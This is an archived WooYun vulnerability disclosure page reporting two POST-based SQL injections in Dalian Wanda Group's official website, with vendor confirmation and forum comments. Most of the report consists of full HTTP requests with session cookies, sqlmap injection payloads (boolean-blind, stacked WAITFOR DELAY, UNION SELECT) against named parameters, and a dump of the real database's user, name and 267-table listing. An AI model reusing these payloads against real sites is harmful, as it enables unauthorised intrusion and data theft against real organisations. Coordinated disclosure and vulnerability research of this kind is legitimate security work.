当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0132136

漏洞标题:大连万达集团股份有限公司官方网站两枚POST型SQL注入打包

相关厂商:大连万达集团股份有限公司

漏洞作者: 百度流氓

提交时间:2015-08-06 16:13

修复时间:2015-09-20 16:48

公开时间:2015-09-20 16:48

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-06: 细节已通知厂商并且等待厂商处理中
2015-08-06: 厂商已经确认,细节仅向厂商公开
2015-08-16: 细节向核心白帽子及相关领域专家公开
2015-08-26: 细节向普通白帽子公开
2015-09-05: 细节向实习白帽子公开
2015-09-20: 细节向公众公开

简要描述:

大连万达集团股份有限公司官方网站两枚POST型SQL注入打包

详细说明:

包1:

POST /api.php?op=feedback HTTP/1.1
Content-Length: 93
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.wanda.cn/
Cookie: WANDACNSESSID=8rurvpb9rhelnotj6kvh6e1ad1; HMVT=cd44f738169a36ff869eee3ca6afb9b1|1438496238|; HMACCOUNT=2C9F94FD6DF138AC; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1438496681,1438496688,1438496718,1438496738; Hm_lpvt_cd44f738169a36ff869eee3ca6afb9b1=1438496738; __utmt=1; __utma=41079204.802376289.1438495914.1438495914.1438495914.1; __utmb=41079204.1.10.1438495914; __utmc=41079204; __utmz=41079204.1438495914.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); BAIDUID=BF1A957F41EF89BAFA6A6BE08083EEC2:FG=1; CNZZDATA5891341=cnzz_eid%3D136358418-1438494730-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1438494730
Host: www.wanda.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
City=1169&DictionaryID=LY&type=GetProJectList


包2:

POST /api.php?op=feedback HTTP/1.1
Content-Length: 68
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Referer: http://www.wanda.cn/
Cookie: WANDACNSESSID=8rurvpb9rhelnotj6kvh6e1ad1; HMVT=cd44f738169a36ff869eee3ca6afb9b1|1438496238|; HMACCOUNT=2C9F94FD6DF138AC; Hm_lvt_cd44f738169a36ff869eee3ca6afb9b1=1438496681,1438496688,1438496718,1438496738; Hm_lpvt_cd44f738169a36ff869eee3ca6afb9b1=1438496738; __utmt=1; __utma=41079204.802376289.1438495914.1438495914.1438495914.1; __utmb=41079204.1.10.1438495914; __utmc=41079204; __utmz=41079204.1438495914.1.1.utmcsr=acunetix-referrer.com|utmccn=(referral)|utmcmd=referral|utmcct=/javascript:domxssExecutionSink(0,"'\"><xsstag>()refdxss"); BAIDUID=BF1A957F41EF89BAFA6A6BE08083EEC2:FG=1; CNZZDATA5891341=cnzz_eid%3D136358418-1438494730-http%253A%252F%252Fwww.acunetix-referrer.com%252F%26ntime%3D1438494730
Host: www.wanda.cn
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.21 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.21
Accept: */*
Province=fWqPza1t&type=getCity

漏洞证明:

1.

QQ截图20150806150248.jpg


2.

QQ截图20150806150616.jpg


截图太麻烦我直接上日志
1.

sqlmap identified the following injection point(s) with a total of 40 HTTP(s) requests:
---
Parameter: DictionaryID (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: City=1169&DictionaryID=LY';WAITFOR DELAY '0:0:5'--&type=GetProJectList
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: City=1169&DictionaryID=LY' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(108)+CHAR(76)+CHAR(108)+CHAR(120)+CHAR(85)+CHAR(66)+CHAR(106)+CHAR(68)+CHAR(70)+CHAR(119)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113),NULL-- &type=GetProJectList
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
current user: 'ksfw_user'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: DictionaryID (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: City=1169&DictionaryID=LY';WAITFOR DELAY '0:0:5'--&type=GetProJectList
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: City=1169&DictionaryID=LY' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(108)+CHAR(76)+CHAR(108)+CHAR(120)+CHAR(85)+CHAR(66)+CHAR(106)+CHAR(68)+CHAR(70)+CHAR(119)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113),NULL-- &type=GetProJectList
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
current database: 'ksfw'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: DictionaryID (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: City=1169&DictionaryID=LY' AND 3158=3158 AND 'hNyR'='hNyR&type=GetProJectList
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: City=1169&DictionaryID=LY';WAITFOR DELAY '0:0:5'--&type=GetProJectList
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: City=1169&DictionaryID=LY' UNION ALL SELECT CHAR(113)+CHAR(122)+CHAR(98)+CHAR(113)+CHAR(113)+CHAR(108)+CHAR(76)+CHAR(108)+CHAR(120)+CHAR(85)+CHAR(66)+CHAR(106)+CHAR(68)+CHAR(70)+CHAR(119)+CHAR(113)+CHAR(106)+CHAR(118)+CHAR(112)+CHAR(113),NULL-- &type=GetProJectList
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
Database: ksfw
[267 tables]
+---------------------------------+
| AL_ADD_APPLY |
| AL_AUDIT_LOG |
| AL_CATE |
| AL_CONTENT |
| AL_CONTENT_CATE |
| AL_CONT_DETAIL |
| AU_ACCREDIT_DATA |
| AU_ACCREDIT_FUNC |
| AU_ACCREDIT_MENU |
| CONT_HANDEL_LOG |
| CUS_ASSIGN_LOG |
| CUS_BL |
| CUS_BLACKLIST |
| CUS_BL_APPLY |
| CUS_BL_CONTACT |
| CUS_BL_INTERVAL |
| CUS_BL_LOG |
| CUS_BL_PHONE |
| CUS_CONTACT |
| CUS_CONT_INFO |
| CUS_CONT_TYPE |
| CUS_DOM |
| CUS_HOBBY |
| CUS_INFO |
| CUS_OR_CONTACT |
| CUS_QU_CONTACT |
| CUS_RECOMMEND |
| CUS_SPEC_EVENT |
| ComplaintPlazaView |
| EHR_EMPLOYEE_ORG_REL_TEMP |
| EHR_EMPLOYEE_POS_REL_TEMP |
| EHR_EMPLOYEE_TEMP |
| EHR_ORGNIZATION_TEMP |
| EHR_POSITION_TEMP |
| EMPLOYEE_ORG_REL |
| FAC_TS_ATTR_DETAIL |
| FAC_TS_ATTR_DETAIL_POEP |
| FAC_TS_CONT_DETAIL |
| FAC_TS_DEAL_TIME_DETAIL |
| FAC_TS_KM_COUNT_DAY |
| FAC_TS_OPER_DETAIL |
| FAC_TS_QD_COUNT_DAY |
| FAC_TS_YJ_DETAIL |
| FAC_TS_ZDY_ATTR_DETAIL |
| FAC_ZJ_CONTACT_HZ_VIEW |
| FAC_ZJ_CONTACT_INFO_VIEW |
| HW_CTICONFIG |
| HW_DUTYMANAGE |
| HW_DUTY_EMP |
| HW_SEATACCREDIT |
| HW_SKILLGROUP |
| HW_SKILLSEAT |
| HW_SKILL_SEAT |
| IMS_BASIC_REPLY |
| IM_NEWS |
| IM_NEWS_REAL_RECEIVER |
| IM_NEWS_RECEIVER |
| IVR_CITY_YETAI |
| IVR_MOBILE_TELEPHONE_MAPPING |
| IVR_OFFLINE_TO_MOBILE |
| IVR_TELEPHONE_AREA_MAPPING |
| IVR_VIP_EMP |
| JBPM4_DEPLOYMENT |
| JBPM4_DEPLOYPROP |
| JBPM4_EXECUTION |
| JBPM4_HIST_ACTINST |
| JBPM4_HIST_DETAIL |
| JBPM4_HIST_PROCINST |
| JBPM4_HIST_TASK |
| JBPM4_HIST_VAR |
| JBPM4_ID_GROUP |
| JBPM4_ID_MEMBERSHIP |
| JBPM4_ID_USER |
| JBPM4_JOB |
| JBPM4_LOB |
| JBPM4_PARTICIPATION |
| JBPM4_PROPERTY |
| JBPM4_SWIMLANE |
| JBPM4_TASK |
| JBPM4_VARIABLE |
| KM_BASEINFO |
| KM_CATE |
| KM_EVAL |
| KM_INFO_REL |
| KN_SUBJECT_CATE |
| KN_SUBJECT_ITEM |
| KN_SURVEY |
| KN_SURVEY_ANSWER |
| KN_SURVEY_R_SUBJECT |
| KN_SURVEY_SUBJECT |
| OAMQMessages |
| OB_ACTIV_BASE |
| OB_ACTIV_OPELOG |
| OB_ACTIV_RULE |
| OB_ASSIGN_ROLE |
| OB_ASSIGN_SET |
| OB_CONTACT_ITEM |
| OB_CONTACT_SET |
| OB_CUS_ATTRI |
| OB_CUS_TEMPL |
| OB_PERMIT_TIME |
| OB_PROJ_BASE |
| OB_PROJ_OPELOG |
| OB_STAGE_BASE |
| OB_STAGE_ITEM |
| ONLINE_CONTACT |
| ONLINE_CONTACT_READ_LOG |
| ONLINE_CONTACT_RECEIVER |
| OP_CT_COLLECT |
| OP_CT_NOTICE |
| OP_CT_NOTICE_READ_LOG |
| OP_CT_NOTICE_RECEIVER |
| ORGNIZATION |
| QD_WHITE_LIST |
| REC_SYN_SMS |
| REL_SPLIT_TYPE |
| RP_CMS_SKILL_HOUR |
| SHEET |
| SHEET_BACK |
| SHEET_CONSULT |
| SHEET_REMINDER |
| SHEET_REPAIRS |
| SHEET_TS |
| SHEET_VOID |
| SYS_ATTACHMENT |
| SYS_BP_ITEM |
| SYS_BP_TYPE |
| SYS_CONTACT_ADDR |
| SYS_DEPARTMENT |
| SYS_DIC |
| SYS_DIC_ITEM |
| SYS_EMP |
| SYS_EMPLOYEE |
| SYS_GROUP |
| SYS_HANDLE_LOG |
| SYS_HOLIDAY |
| SYS_LOG_OPERATE |
| SYS_MENU |
| SYS_MENU_NAV |
| SYS_OPRITION_LOG |
| SYS_ORG_ROLE |
| SYS_PASSWORD_POLICY |
| SYS_REGION |
| SYS_RESOURCE |
| SYS_ROLE |
| SYS_ROLE_CATE |
| SYS_ROLE_EMP |
| SYS_ROLE_GROUP |
| SYS_ROLE_MENU |
| SYS_ROLE_PARAM |
| SYS_ROLE_USER |
| SYS_SP_ITEM |
| SYS_SP_TYPE |
| SYS_TENEMENT |
| SYS_TENEMENT_DOC |
| SYS_USER |
| SYS_USER_GROUP |
| SYS_USER_LOGIN_LOG |
| SYS_WORKTIME |
| TOOL_NOTE |
| TSM_Messages |
| Temp_Organizations |
| WC_ACCOUNT |
| WC_FANS |
| WC_FANS_GROUP |
| WC_ISSUE |
| WC_MATERIAL_API |
| WC_MATERIAL_PICTURE |
| WC_MATERIAL_VOICE |
| WC_MEMBER |
| WC_MEMBER_GROUP |
| WC_MENU |
| WC_MSG_SEND |
| WC_REPLY_RULE |
| WC_REPLY_TEXT |
| WC_REPLY_VIDEO |
| WC_RULE_KEYWORD |
| WC_RULE_REPLY |
| WC_USER_BINDING |
| WD_MASS_HANDLE |
| WD_MASS_INCIDENT |
| WD_MASS_TASK |
| WD_ORDERHANDLE |
| WD_SG |
| WD_TS_SHEET |
| WD_WEBORDER |
| WD_YQJK |
| WFE_APPROVE_LOG |
| WFE_BEFORE_LOG |
| WFE_HANDLE_APPLY |
| WFE_REMINDER_LOG |
| WFE_SHEET |
| WFE_SHIFT_LOG |
| WFE_TODO |
| WFE_TODO_ASSIGNMENT |
| WFE_UPGRADE_LOG |
| WFE_URGE |
| WF_AR_NOTICE_LOG |
| WF_AR_NOTICE_LOG_20150420before |
| WF_AR_NOTICE_LOG_CURR_temp |
| WF_AR_NOTICE_LOG_temp |
| WF_AR_RE_LOG |
| WF_Add_DATA |
| WF_FLOW_CATE |
| WF_FLOW_INFO |
| WF_FLOW_VARIABLE |
| WF_NODE |
| WF_NODE_ALERT |
| WF_NODE_ALTER_REG |
| WF_NODE_CONDITION |
| WF_NODE_EXEC_REG |
| WF_NODE_NOTICE |
| WF_NODE_ROLE |
| WF_NODE_TIME |
| WF_SHEEP_ASSOCIATED |
| WF_SHEET_ASSOCIATED |
| WSQ_BUILDING |
| WSQ_COMMUNITY |
| WSQ_FAN_CUS |
| WSQ_ROOM |
| WSQ_UNIT |
| Wanda_RT_CONTRACT |
| ZJ_BATCH_BASE |
| ZJ_BATCH_CONTACT |
| ZJ_BATCH_DF |
| ZJ_BATCH_RULE |
| ZJ_BATCH_SF |
| ZJ_BATCH_SHEET |
| ZJ_CONT_ITEM |
| ZJ_CONT_ITEM_KPI |
| ZJ_CONT_ITEM_KPI_PUBLISH |
| ZJ_CONT_ITEM_PUBLISH |
| ZJ_EVAL_BASE |
| ZJ_EVAL_CHECK |
| ZJ_EVAL_ITEM |
| ZJ_EVAL_S_BASE |
| ZJ_EVAL_S_RULE |
| ZJ_EXAMRULE_CONT |
| ZJ_EXAM_RULE |
| ZJ_PROJ_BASE |
| ZJ_PROJ_ROLE |
| ZJ_REF |
| ZJ_REF_CONT |
| ZJ_REF_DEPT |
| ZJ_REVIEW |
| ZJ_TEMPL |
| ZJ_TEMPL_BASE |
| ZJ_TEMPL_ITEM |
| ZJ_TEMPL_ITEM_KPI |
| ZJ_TEMPL_KPI |
| ZJ_TEMPL_PUBLISH |
| ZJ_TEMP_CONT |
| ZJ_TEMP_CONT_PUBLISH |
| ZJ_THRES |
| ZJ_THRES_BASE |
| ZJ_THRES_RULE |
| ZJ_ZJDF_JZITEM_LOG |
| ZJ_ZJRW |
| ZJ_ZJRW_ASSIGN_LOG |
| ZJ_ZJRW_ROLE |
| ZJ_test1 |
| rec_syn_cms |
| unEmpForRole |
| unEmpInfoForRole |
| wsq_commu_cus |
| wsq_zutuan |
| 查询 |
+---------------------------------+


2.

sqlmap identified the following injection point(s) with a total of 58 HTTP(s) requests:
---
Parameter: Province (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: Province=fWqPza1t';WAITFOR DELAY '0:0:5'--&type=getCity
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(89)+CHAR(83)+CHAR(65)+CHAR(83)+CHAR(106)+CHAR(86)+CHAR(112)+CHAR(66)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL-- &type=getCity
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
current user: 'ksfw_user'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Province (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: Province=fWqPza1t';WAITFOR DELAY '0:0:5'--&type=getCity
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(89)+CHAR(83)+CHAR(65)+CHAR(83)+CHAR(106)+CHAR(86)+CHAR(112)+CHAR(66)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL-- &type=getCity
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
current database: 'ksfw'
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: Province (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: Province=fWqPza1t';WAITFOR DELAY '0:0:5'--&type=getCity
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: Province=fWqPza1t' UNION ALL SELECT CHAR(113)+CHAR(120)+CHAR(120)+CHAR(106)+CHAR(113)+CHAR(110)+CHAR(110)+CHAR(89)+CHAR(83)+CHAR(65)+CHAR(83)+CHAR(106)+CHAR(86)+CHAR(112)+CHAR(66)+CHAR(113)+CHAR(98)+CHAR(118)+CHAR(98)+CHAR(113),NULL-- &type=getCity
---
web application technology: Nginx, PHP 5.3.25
back-end DBMS: Microsoft SQL Server 2008
Database: ksfw
[267 tables]
+---------------------------------+
| AL_ADD_APPLY |
| AL_AUDIT_LOG |
| AL_CATE |
| AL_CONTENT |
| AL_CONTENT_CATE |
| AL_CONT_DETAIL |
| AU_ACCREDIT_DATA |
| AU_ACCREDIT_FUNC |
| AU_ACCREDIT_MENU |
| CONT_HANDEL_LOG |
| CUS_ASSIGN_LOG |
| CUS_BL |
| CUS_BLACKLIST |
| CUS_BL_APPLY |
| CUS_BL_CONTACT |
| CUS_BL_INTERVAL |
| CUS_BL_LOG |
| CUS_BL_PHONE |
| CUS_CONTACT |
| CUS_CONT_INFO |
| CUS_CONT_TYPE |
| CUS_DOM |
| CUS_HOBBY |
| CUS_INFO |
| CUS_OR_CONTACT |
| CUS_QU_CONTACT |
| CUS_RECOMMEND |
| CUS_SPEC_EVENT |
| ComplaintPlazaView |
| EHR_EMPLOYEE_ORG_REL_TEMP |
| EHR_EMPLOYEE_POS_REL_TEMP |
| EHR_EMPLOYEE_TEMP |
| EHR_ORGNIZATION_TEMP |
| EHR_POSITION_TEMP |
| EMPLOYEE_ORG_REL |
| FAC_TS_ATTR_DETAIL |
| FAC_TS_ATTR_DETAIL_POEP |
| FAC_TS_CONT_DETAIL |
| FAC_TS_DEAL_TIME_DETAIL |
| FAC_TS_KM_COUNT_DAY |
| FAC_TS_OPER_DETAIL |
| FAC_TS_QD_COUNT_DAY |
| FAC_TS_YJ_DETAIL |
| FAC_TS_ZDY_ATTR_DETAIL |
| FAC_ZJ_CONTACT_HZ_VIEW |
| FAC_ZJ_CONTACT_INFO_VIEW |
| HW_CTICONFIG |
| HW_DUTYMANAGE |
| HW_DUTY_EMP |
| HW_SEATACCREDIT |
| HW_SKILLGROUP |
| HW_SKILLSEAT |
| HW_SKILL_SEAT |
| IMS_BASIC_REPLY |
| IM_NEWS |
| IM_NEWS_REAL_RECEIVER |
| IM_NEWS_RECEIVER |
| IVR_CITY_YETAI |
| IVR_MOBILE_TELEPHONE_MAPPING |
| IVR_OFFLINE_TO_MOBILE |
| IVR_TELEPHONE_AREA_MAPPING |
| IVR_VIP_EMP |
| JBPM4_DEPLOYMENT |
| JBPM4_DEPLOYPROP |
| JBPM4_EXECUTION |
| JBPM4_HIST_ACTINST |
| JBPM4_HIST_DETAIL |
| JBPM4_HIST_PROCINST |
| JBPM4_HIST_TASK |
| JBPM4_HIST_VAR |
| JBPM4_ID_GROUP |
| JBPM4_ID_MEMBERSHIP |
| JBPM4_ID_USER |
| JBPM4_JOB |
| JBPM4_LOB |
| JBPM4_PARTICIPATION |
| JBPM4_PROPERTY |
| JBPM4_SWIMLANE |
| JBPM4_TASK |
| JBPM4_VARIABLE |
| KM_BASEINFO |
| KM_CATE |
| KM_EVAL |
| KM_INFO_REL |
| KN_SUBJECT_CATE |
| KN_SUBJECT_ITEM |
| KN_SURVEY |
| KN_SURVEY_ANSWER |
| KN_SURVEY_R_SUBJECT |
| KN_SURVEY_SUBJECT |
| OAMQMessages |
| OB_ACTIV_BASE |
| OB_ACTIV_OPELOG |
| OB_ACTIV_RULE |
| OB_ASSIGN_ROLE |
| OB_ASSIGN_SET |
| OB_CONTACT_ITEM |
| OB_CONTACT_SET |
| OB_CUS_ATTRI |
| OB_CUS_TEMPL |
| OB_PERMIT_TIME |
| OB_PROJ_BASE |
| OB_PROJ_OPELOG |
| OB_STAGE_BASE |
| OB_STAGE_ITEM |
| ONLINE_CONTACT |
| ONLINE_CONTACT_READ_LOG |
| ONLINE_CONTACT_RECEIVER |
| OP_CT_COLLECT |
| OP_CT_NOTICE |
| OP_CT_NOTICE_READ_LOG |
| OP_CT_NOTICE_RECEIVER |
| ORGNIZATION |
| QD_WHITE_LIST |
| REC_SYN_SMS |
| REL_SPLIT_TYPE |
| RP_CMS_SKILL_HOUR |
| SHEET |
| SHEET_BACK |
| SHEET_CONSULT |
| SHEET_REMINDER |
| SHEET_REPAIRS |
| SHEET_TS |
| SHEET_VOID |
| SYS_ATTACHMENT |
| SYS_BP_ITEM |
| SYS_BP_TYPE |
| SYS_CONTACT_ADDR |
| SYS_DEPARTMENT |
| SYS_DIC |
| SYS_DIC_ITEM |
| SYS_EMP |
| SYS_EMPLOYEE |
| SYS_GROUP |
| SYS_HANDLE_LOG |
| SYS_HOLIDAY |
| SYS_LOG_OPERATE |
| SYS_MENU |
| SYS_MENU_NAV |
| SYS_OPRITION_LOG |
| SYS_ORG_ROLE |
| SYS_PASSWORD_POLICY |
| SYS_REGION |
| SYS_RESOURCE |
| SYS_ROLE |
| SYS_ROLE_CATE |
| SYS_ROLE_EMP |
| SYS_ROLE_GROUP |
| SYS_ROLE_MENU |
| SYS_ROLE_PARAM |
| SYS_ROLE_USER |
| SYS_SP_ITEM |
| SYS_SP_TYPE |
| SYS_TENEMENT |
| SYS_TENEMENT_DOC |
| SYS_USER |
| SYS_USER_GROUP |
| SYS_USER_LOGIN_LOG |
| SYS_WORKTIME |
| TOOL_NOTE |
| TSM_Messages |
| Temp_Organizations |
| WC_ACCOUNT |
| WC_FANS |
| WC_FANS_GROUP |
| WC_ISSUE |
| WC_MATERIAL_API |
| WC_MATERIAL_PICTURE |
| WC_MATERIAL_VOICE |
| WC_MEMBER |
| WC_MEMBER_GROUP |
| WC_MENU |
| WC_MSG_SEND |
| WC_REPLY_RULE |
| WC_REPLY_TEXT |
| WC_REPLY_VIDEO |
| WC_RULE_KEYWORD |
| WC_RULE_REPLY |
| WC_USER_BINDING |
| WD_MASS_HANDLE |
| WD_MASS_INCIDENT |
| WD_MASS_TASK |
| WD_ORDERHANDLE |
| WD_SG |
| WD_TS_SHEET |
| WD_WEBORDER |
| WD_YQJK |
| WFE_APPROVE_LOG |
| WFE_BEFORE_LOG |
| WFE_HANDLE_APPLY |
| WFE_REMINDER_LOG |
| WFE_SHEET |
| WFE_SHIFT_LOG |
| WFE_TODO |
| WFE_TODO_ASSIGNMENT |
| WFE_UPGRADE_LOG |
| WFE_URGE |
| WF_AR_NOTICE_LOG |
| WF_AR_NOTICE_LOG_20150420before |
| WF_AR_NOTICE_LOG_CURR_temp |
| WF_AR_NOTICE_LOG_temp |
| WF_AR_RE_LOG |
| WF_Add_DATA |
| WF_FLOW_CATE |
| WF_FLOW_INFO |
| WF_FLOW_VARIABLE |
| WF_NODE |
| WF_NODE_ALERT |
| WF_NODE_ALTER_REG |
| WF_NODE_CONDITION |
| WF_NODE_EXEC_REG |
| WF_NODE_NOTICE |
| WF_NODE_ROLE |
| WF_NODE_TIME |
| WF_SHEEP_ASSOCIATED |
| WF_SHEET_ASSOCIATED |
| WSQ_BUILDING |
| WSQ_COMMUNITY |
| WSQ_FAN_CUS |
| WSQ_ROOM |
| WSQ_UNIT |
| Wanda_RT_CONTRACT |
| ZJ_BATCH_BASE |
| ZJ_BATCH_CONTACT |
| ZJ_BATCH_DF |
| ZJ_BATCH_RULE |
| ZJ_BATCH_SF |
| ZJ_BATCH_SHEET |
| ZJ_CONT_ITEM |
| ZJ_CONT_ITEM_KPI |
| ZJ_CONT_ITEM_KPI_PUBLISH |
| ZJ_CONT_ITEM_PUBLISH |
| ZJ_EVAL_BASE |
| ZJ_EVAL_CHECK |
| ZJ_EVAL_ITEM |
| ZJ_EVAL_S_BASE |
| ZJ_EVAL_S_RULE |
| ZJ_EXAMRULE_CONT |
| ZJ_EXAM_RULE |
| ZJ_PROJ_BASE |
| ZJ_PROJ_ROLE |
| ZJ_REF |
| ZJ_REF_CONT |
| ZJ_REF_DEPT |
| ZJ_REVIEW |
| ZJ_TEMPL |
| ZJ_TEMPL_BASE |
| ZJ_TEMPL_ITEM |
| ZJ_TEMPL_ITEM_KPI |
| ZJ_TEMPL_KPI |
| ZJ_TEMPL_PUBLISH |
| ZJ_TEMP_CONT |
| ZJ_TEMP_CONT_PUBLISH |
| ZJ_THRES |
| ZJ_THRES_BASE |
| ZJ_THRES_RULE |
| ZJ_ZJDF_JZITEM_LOG |
| ZJ_ZJRW |
| ZJ_ZJRW_ASSIGN_LOG |
| ZJ_ZJRW_ROLE |
| ZJ_test1 |
| rec_syn_cms |
| unEmpForRole |
| unEmpInfoForRole |
| wsq_commu_cus |
| wsq_zutuan |
| 查询 |
+---------------------------------+


下边的下边就不操作了,日志一目了然。

修复方案:

一个api.php3个注入,我也是醉了。
大神在万达,你们比我懂.........

版权声明:转载请注明来源 百度流氓@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:12

确认时间:2015-08-06 16:47

厂商回复:

感谢百度流氓同学的持续关注与贡献!马上通知业务整改!

最新状态:

暂无


漏洞评价:

评论

  1. 2015-08-06 16:37 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @百度流氓 又找了两枚啊 昨天一枚

  2. 2015-08-06 16:40 | 百度流氓 ( 路人 | Rank:28 漏洞数:4 | 老衲法号:乱来)

    @牛 小 帅 嗯,万达厂商真心不错所以在万达下点功夫。

  3. 2015-08-06 16:41 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @百度流氓 速度好快 嘎嘎

  4. 2015-08-06 17:10 | zeracker 认证白帽子 ( 核心白帽子 | Rank:1068 漏洞数:137 | 多乌云、多机会!微信公众号: id:a301zls ...)

    厂商拿了最佳靠谱的厂商,看这样子 是要发礼品卡的节奏 @万达

  5. 2015-08-06 17:15 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @zeracker 我的芒果显示已送礼物给我 可是他连我联系方式都好像没

  6. 2015-08-06 17:19 | 百度流氓 ( 路人 | Rank:28 漏洞数:4 | 老衲法号:乱来)

    @牛 小 帅 。。。。。

  7. 2015-08-06 17:21 | 牛 小 帅 ( 普通白帽子 | Rank:363 漏洞数:84 | [code]心若没有栖息的地方,走到哪里都是在...)

    @百度流氓 我错了 i am sorry